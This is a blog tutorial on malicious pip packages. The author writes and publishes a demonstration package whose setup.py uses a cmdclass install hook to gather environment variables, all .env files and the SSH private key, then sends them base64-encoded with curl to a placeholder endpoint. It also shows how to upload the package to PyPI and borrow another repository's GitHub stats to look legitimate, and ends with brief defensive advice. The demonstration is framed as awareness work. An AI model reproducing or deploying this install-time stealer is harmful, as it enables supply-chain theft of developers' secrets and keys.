pip is the standard package manager for Python: it lets you install, update, and remove packages in your Python environments. It comes in very handy when you want to use open-source external libraries in your code.
You can download Python packages from the Python Package Index (PyPI) and install them with pip, or you can use pip to install a package from source code you have locally.
# install from pypi
pip install <package-name>
# or install from local source code (-e installs it in editable/development mode)
pip install -e <path>
For example, to install a package called python-whois that is available at PyPI (https://pypi.org/project/python-whois/), you can execute the following command:
pip install python-whois
This first downloads the package from PyPI and then installs it.
What if I tell you that hackers can steal your critical assets (like API keys, SSH keys, passwords, etc) by just making you install a malicious package with pip?
That's right! A pip command as simple and innocent as pip install <package-name> can be very dangerous to you and your organization!
Let me explain in detail.
There are two scenarios when using pip to install an external package:
Installing from a source distribution (.zip, .tar.gz, etc) - A source distribution is nothing but an archive that contains the source code of that particular package. When installing a package that offers only a source distribution, pip first downloads the archive and then builds it on your machine by executing its setup.py script, which produces a wheel file (.whl). The package is finally installed from this .whl file.
Installing from a wheel (.whl) - A wheel can be considered a pre-built version of the Python package. The package is built on the developer's end and the wheels are published alongside it. When a package has pre-built wheels, installation is much faster because nothing needs to be built, and it also avoids arbitrary code execution during installation because setup.py does not have to be executed on the user's end.
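To make the distinction concrete, here is a minimal sketch that tells the two kinds of distribution apart by file name alone. The function name and the list of archive suffixes are my own choices for illustration, and the list is not exhaustive.

```python
from pathlib import PurePosixPath

# Common source-distribution archive suffixes (an illustrative, non-exhaustive list).
SDIST_SUFFIXES = (".tar.gz", ".zip", ".tar.bz2", ".tgz")


def distribution_kind(filename: str) -> str:
    """Classify a distribution file as 'wheel', 'sdist', or 'unknown' by its name."""
    name = PurePosixPath(filename).name.lower()
    if name.endswith(".whl"):
        return "wheel"
    if name.endswith(SDIST_SUFFIXES):
        return "sdist"
    return "unknown"


if __name__ == "__main__":
    # Hypothetical file names, used only to exercise the function.
    for example in ("example_pkg-1.0.4.tar.gz", "example_pkg-1.0.4-py3-none-any.whl"):
        print(example, "->", distribution_kind(example))
```

A file classified as "sdist" is the case where setup.py may run on your machine during installation.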
The setup.py script
Traditionally, a Python package has a setup.py file in its root directory which contains the metadata of that package (package name, dependencies, license, description, etc) required when building a wheel file (.whl). Because it is an ordinary Python script, it can also contain arbitrary code, and that code runs whenever the script is executed.
The setup.py will be executed when building the wheel (.whl) file. The problem arises when it is executed on the user's end because this results in arbitrary code execution on the user's machine. As discussed earlier, this only occurs when you are installing a package from a source distribution instead of a wheel file.
Obviously, this is an advantage for threat actors, as they can put malicious code in their setup.py script and trick users into installing their malicious packages.
And in fact, this has happened many times. One of the most recent incidents of malicious pip packages stealing developers' critical information is described here.
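Since the risk comes from code that setup.py runs at install time, a quick static look at the script can surface the most obvious warning signs without executing anything. The sketch below parses the script with Python's ast module and reports imports from a small watch list plus any use of the cmdclass argument. The watch list and the function name are assumptions made for this example; legitimate packages use these features too, so a finding is a prompt to read the code, not proof of malice.

```python
import ast
from typing import List, Tuple

# Modules whose presence in a setup.py deserves a closer look.
# This heuristic list is an assumption of the sketch, not an official one.
SUSPICIOUS_MODULES = {"subprocess", "socket", "base64", "urllib", "requests"}


def find_setup_red_flags(source: str) -> List[Tuple[int, str]]:
    """Return (line number, finding) pairs for setup.py source text.

    The source is only parsed, never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            modules = [node.module or ""]
        else:
            modules = []
        for module in modules:
            root = module.split(".")[0]
            if root in SUSPICIOUS_MODULES:
                findings.append((node.lineno, f"imports {root}"))
        # cmdclass lets a package replace commands such as 'install' with its own code.
        if isinstance(node, ast.keyword) and node.arg == "cmdclass":
            findings.append((node.value.lineno, "overrides a setup command via cmdclass"))
    return sorted(findings)
```

Calling find_setup_red_flags(open("setup.py").read()) on a script you have downloaded returns an empty list when none of these patterns appear.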
Let's write our own malicious python package
I will create a sample python package and include some malicious code in my setup.py to demonstrate how easy it is to implement.
Here is the project structure:
malicious-package
│   setup.py
│
└───src
    └───test_average
            average.py
            __init__.py
I've created the setup.py script in the root directory.
In the "src" directory, I have a package named "test_average" which has a Python program "average.py". It contains a sample function that takes a list of integers as input and returns the average. The logic of this program doesn't matter; it is just for the demo.
The __init__.py just tells Python that the corresponding folder (test_average) is to be treated as a package.
The contents of setup.py:
import setuptools

setuptools.setup(
    name = "malicious-pip-package-for-demo",
    version = "1.0.4",
    author = "Malicious Actor",
    author_email = "malactor@example.com",
    description = "A test package to demonstrate malicious pip packages",
    long_description = "long description",
    long_description_content_type = "text/markdown",
    url = "https://github.com/teja156/autobot-clipper",
    project_urls = {
        "Bug Tracker": "https://github.com/teja156/autobot-clipper/issues",
    },
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    package_dir = {"": "src"},
    packages = setuptools.find_packages(where="src"),
    python_requires = ">=3.6",
)
You can see that it defines the metadata of my sample project like the name, version, author, description, etc.
I will include some malicious code here that steals the following and sends it all to an endpoint using cURL:
All the environment variables
All .env files that contain project-specific environment variables
The SSH private key located in ~/.ssh/id_rsa
def stealenv():
# Steal environment variables from shell and from .env
dotenv = ""
environs = {}
paths = []
if platform == "win32":
# Windows
# get all drives
available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]
curr_dir = os.getcwd()
os.chdir("/")
for drive in available_drives:
powershell_cmd = "powershell.exe Get-ChildItem -Path %s -Filter *.env -Recurse -ErrorAction SilentlyContinue -Force -File | ForEach-Object {$_.FullName}"%(drive)
print(powershell_cmd)
powershell_cmd = powershell_cmd.split(" ")
try:
result = subprocess.run(powershell_cmd, capture_output=True, timeout=2)
output = result.stdout.decode()
output = output.split("\n")
if len(output)==0:
continue
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
continue
for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"
os.chdir(curr_dir)
else:
# Linux and Mac
home_path = str(Path.home())
cmd = f"find {home_path} -type f -name *.env"
cmd = cmd.split(" ")
try:
result = subprocess.run(cmd, capture_output=True, timeout=5)
output = result.stdout.decode().split("\n")
if len(output)==0:
return
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
pass
for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"
for name, value in os.environ.items():
environs[name] = value
try:
dotenv = base64.b64encode(dotenv.encode()).decode()
environs = base64.b64encode(str(environs).encode()).decode()
URL = "http://<IP_OF_ENDPOINT>"
req1 = f"{URL}/?dotenv={dotenv}"
req2 = f"{URL}/?environs={environs}"
subprocess.check_output(["curl",req1])
subprocess.check_output(["curl",req2])
except Exception as e:
pass
def stealsshkey():
home_path = str(Path.home())
privkey = ""
if not os.path.exists(os.path.join(home_path, ".ssh","id_rsa")):
return
with open(os.path.join(home_path, ".ssh","id_rsa"),"r") as f:
privkey = f.read()
if privkey=="" or privkey is None:
return
try:
privkey = base64.b64encode(privkey.encode()).decode()
URL = "http://<IP_OF_ENDPOINT>"
req = f"{URL}/?id_rsa={privkey}"
subprocess.check_output(["curl",req])
except Exception as e:
pass
I will now call these malicious functions in my setup.py script using the 'cmdclass' attribute so that they will be executed when the package is being installed.
import setuptools
from setuptools.command.install import install

class AfterInstall(install):
    def run(self):
        install.run(self)
        stealenv()
        stealsshkey()

setuptools.setup(
    name = "malicious-pip-package-for-demo",
    version = "1.0.4",
    author = "Malicious Actor",
    author_email = "malactor@example.com",
    description = "A test package to demonstrate malicious pip packages",
    long_description = "long description",
    long_description_content_type = "text/markdown",
    url = "https://github.com/teja156/autobot-clipper",
    project_urls = {
        "Bug Tracker": "https://github.com/teja156/autobot-clipper/issues",
    },
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    package_dir = {"": "src"},
    packages = setuptools.find_packages(where="src"),
    python_requires = ">=3.6",
    cmdclass={
        'install': AfterInstall,
    },
)
The full code can be found on my GitHub.
And that's it! I can now create a source distribution of this package with this command.
python setup.py sdist --formats=gztar
This will create a dist folder in the current directory, and inside it is a .tar.gz file.
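A source distribution like this is just a gzip-compressed tar archive, so its setup.py can be read without installing or executing anything. The sketch below does that with the standard tarfile module. The function name is made up for this example, and it assumes the usual sdist layout in which everything sits inside a single top-level folder.

```python
import tarfile
from typing import Optional


def read_setup_py(sdist_path: str) -> Optional[str]:
    """Return the text of the top-level setup.py in a .tar.gz sdist, or None.

    The archive is only read; nothing is extracted to disk or executed.
    """
    with tarfile.open(sdist_path, "r:gz") as archive:
        for member in archive.getmembers():
            parts = member.name.split("/")
            # Assumed layout: "<name>-<version>/setup.py" directly under the top folder.
            if member.isfile() and len(parts) == 2 and parts[1] == "setup.py":
                extracted = archive.extractfile(member)
                if extracted is not None:
                    return extracted.read().decode("utf-8", errors="replace")
    return None
```

Printing the result of read_setup_py on an archive in the dist folder shows exactly what pip would execute when building the package from source.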
You can now upload this source distribution to PyPI by following these steps:
Create an account on PyPI.org
Install twine
pip install twine
Upload your project
twine upload dist/* --verbose
And your project is now on PyPI!
In the above image, you can see the GitHub statistics - my package has 47 stars, 18 forks, and 2 PRs?!
Well, that is because in my setup.py I have provided the URL of some other GitHub repository, so the stats of that repository are shown here. This is a great way for threat actors to trick users into thinking that their malicious package is popular and well known in the open-source community, when in reality they are just borrowing some other open-source project's stats.
Let's test our malicious package
Now that our package is on PyPI we will be able to install it directly with pip.
You can see in the screenshot above, pip first downloaded the source distribution, executed the setup.py script, and built a wheel file out of it.
Anyway, now that the setup.py script has been executed, let me check my endpoint where the stolen details are sent using cURL.
As you can see in the above picture, I have received three GET requests with some base64 encoded data. Let me decode them.
Decoded results:
In the above pictures, you can see the environment variables of one of my projects and my SSH private key. These were stolen by my malicious package while it was being installed and sent to my HTTP endpoint. How scary is that?
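The decoding step mentioned above can be sketched in a few lines. The helper name and the example host are hypothetical. The sketch also works around one detail of sending standard base64 in a query string: URL parsers treat a literal "+" as a space, so the spaces are turned back into "+" before decoding.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_query_param(url: str, name: str) -> str:
    """Decode the base64 value of one query parameter from a logged request URL."""
    values = parse_qs(urlsplit(url).query).get(name)
    if not values:
        raise KeyError(name)
    # parse_qs converts "+" to a space; restore it so the base64 text is valid again.
    encoded = values[0].replace(" ", "+")
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Hypothetical logged request carrying the base64 form of "DEBUG=true".
    token = base64.b64encode(b"DEBUG=true").decode()
    print(decode_query_param(f"http://endpoint.invalid/?dotenv={token}", "dotenv"))
```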
How do you stay safe from malicious packages?
Simple,
Make sure you cross-check the GitHub repo linked from a PyPI package's page and verify that it is what it claims to be.
Install packages only from wheel files, not from source distributions. You can use the --only-binary :all: flag with pip for this; pip will then refuse to install a package that has no wheel available.
Take some time to go through the actual source code of the package before installing it just to make sure it contains nothing malicious.
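If you install packages from scripts, the wheel-only recommendation above can be applied there as well. This is a minimal sketch with made-up function names: it builds the pip command with the --only-binary :all: flag and runs it with the same interpreter that runs the script.

```python
import subprocess
import sys
from typing import List


def wheel_only_install_command(requirement: str) -> List[str]:
    """Build a pip command that refuses source distributions for every package."""
    return [sys.executable, "-m", "pip", "install", "--only-binary", ":all:", requirement]


def install_wheel_only(requirement: str) -> int:
    """Run the command and return pip's exit code."""
    return subprocess.run(wheel_only_install_command(requirement)).returncode
```

For example, install_wheel_only("python-whois") returns a non-zero exit code if pip cannot find a suitable wheel, rather than falling back to building from source.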